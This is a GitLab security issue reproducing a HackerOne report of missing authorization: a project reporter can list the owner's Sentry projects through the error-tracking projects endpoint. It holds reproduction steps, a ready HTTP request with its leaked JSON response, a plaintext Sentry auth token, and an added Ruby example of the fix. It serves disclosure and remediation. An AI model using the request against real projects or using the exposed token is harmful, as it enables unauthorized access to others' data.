
A project reporter can leak owner's Sentry instance projects

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1947211 by js_noob on 2023-04-14, assigned to @dcouture:


Report

Summary

Hello team, as part of project error tracking, a user (owner or maintainer) can connect Sentry to GitLab to track project errors. This step allows the "owner" to connect to Sentry to fetch the available projects; this should only be available to "owners". This can be done by clicking the Connect button under Project Settings => Monitor => Error Tracking; see the screenshot below. However, even a project reporter can fetch the connected Sentry instance's projects.

(screenshot attachment: image.png)

Steps to reproduce

As an owner:

  1. Create a new ultimate trial group, and create a new project in that group
  2. Enable Sentry error tracking by going to https://gitlab.com/GROUP/PROJECT/-/settings/operations under Error tracking, you can use my Sentry instance, and choose any project in the drop-down:
    * Sentry API URL: https://xyz-6jv.sentry.io/
    * Auth Token: a6d9c60bd9254c19995af8f0502b6d9aa2412dd92e724204a8b948e52b87dfc1

(screenshot attachment: image.png)

  3. Invite a reporter to the project/group

As the reporter:

  1. Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/operations and verify that you are blocked
  2. Send the following request to grab all the Sentry instance projects. Change the api_host if you used your own instance:

```http
GET /GROUP/PROJECT/-/error_tracking/projects?api_host=https://xyz-6jv.sentry.io/&token=* HTTP/2
Host: gitlab.com
Cookie: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: REDACTED
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
```

  3. The response should look similar to the one below, leaking all projects:

```json
{
  "projects": [
    {
      "id": "4505012306182144",
      "name": "secret-project",
      "status": "active",
      "slug": "secret-project",
      "organization_name": "XYZ",
      "organization_id": "4505012227342336",
      "organization_slug": "xyz-6jv"
    },
    {
      "id": "4505012228915200",
      "name": "javascript",
      "status": "active",
      "slug": "javascript",
      "organization_name": "XYZ",
      "organization_id": "4505012227342336",
      "organization_slug": "xyz-6jv"
    }
  ]
}
```

NB: I know that this exploitation requires knowing the Sentry domain, but there are a lot of ways this can be done; a couple of examples: if the reporter was a maintainer and was demoted, or simply by brute force. However, the "real" bug/issue here is the missing authorization on -/error_tracking/projects.

Video/POC

bandicam_2023-04-14_14-56-04-252.mp4

Impact

A project reporter can leak the owner's Sentry instance projects by knowing the domain, without the auth token.
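The authorization gap the report describes, modelled as an added example. This is not GitLab's code and not part of the report: the `AccessLevel` module, the `ErrorTrackingSetting` struct, the stub `list_sentry_projects` call, the `resolve_token` fallback (the request above carries `token=*` and still succeeds, so the server must substitute the stored token; exactly how is an assumption) and the `MAINTAINER` threshold for the hardened variant are all assumptions. The numeric access levels are GitLab's own. The hardened variant gates the endpoint on the same privilege the settings page already enforces, which is the check the reporter found missing.

```ruby
# Added example (not GitLab's code): a minimal model of the authorization gap
# in the error-tracking projects endpoint, with the gated variant beside it.
# Names, the stub Sentry call and the MAINTAINER threshold are assumptions;
# the numeric access levels are GitLab's documented values.

module AccessLevel
  GUEST      = 10
  REPORTER   = 20
  DEVELOPER  = 30
  MAINTAINER = 40
  OWNER      = 50
end

# Stand-in for the project's stored error-tracking settings.
ErrorTrackingSetting = Struct.new(:api_host, :token, keyword_init: true)

# Stand-in for the outbound Sentry API call. The returned list is constructed
# to mirror the shape of the response quoted in the report; a missing or
# masked token yields nothing, as the real API would reject it.
def list_sentry_projects(api_host, token)
  return [] unless token && !token.empty? && token != "*"

  [
    { "id" => "4505012306182144", "name" => "secret-project", "status" => "active",
      "slug" => "secret-project", "organization_slug" => "xyz-6jv" },
    { "id" => "4505012228915200", "name" => "javascript", "status" => "active",
      "slug" => "javascript", "organization_slug" => "xyz-6jv" }
  ]
end

# Resolve the token the request will use. The request in the report carries
# token=* and still succeeds, so the server must be substituting the stored
# token; modelling that as a fallback on the masked value is an assumption.
def resolve_token(params, setting)
  params[:token] == "*" ? setting.token : params[:token]
end

# Vulnerable shape: the only gate is project membership, so a reporter
# (access level 20) who knows the Sentry host gets the full project list.
def list_projects_vulnerable(access_level:, setting:, params:)
  return [403, { "message" => "Forbidden" }] if access_level < AccessLevel::GUEST

  [200, { "projects" => list_sentry_projects(params[:api_host], resolve_token(params, setting)) }]
end

# Hardened shape: gate the lookup on the privilege the settings page already
# enforces (the reporter is blocked at -/settings/operations), so the JSON
# endpoint cannot be used to bypass that page. MAINTAINER is assumed here;
# raise it to OWNER if that is the intended policy.
def list_projects_hardened(access_level:, setting:, params:)
  return [403, { "message" => "Forbidden" }] if access_level < AccessLevel::MAINTAINER

  [200, { "projects" => list_sentry_projects(params[:api_host], resolve_token(params, setting)) }]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: the owner stored a token; the reporter sends token=*.
  setting = ErrorTrackingSetting.new(api_host: "https://xyz-6jv.sentry.io/", token: "stored-owner-token")
  params  = { api_host: "https://xyz-6jv.sentry.io/", token: "*" }

  [[:vulnerable, method(:list_projects_vulnerable)], [:hardened, method(:list_projects_hardened)]].each do |name, fn|
    status, body = fn.call(access_level: AccessLevel::REPORTER, setting: setting, params: params)
    puts "#{name}: reporter gets #{status} (#{body["projects"]&.size || 0} projects)"
  end
end
```

The point to carry into the real fix is that the HTML settings page and the JSON endpoint behind it must share one authorization rule; a reporter the page already blocks must receive the same 403 from the endpoint, regardless of what `api_host` or `token` value the request carries.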

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: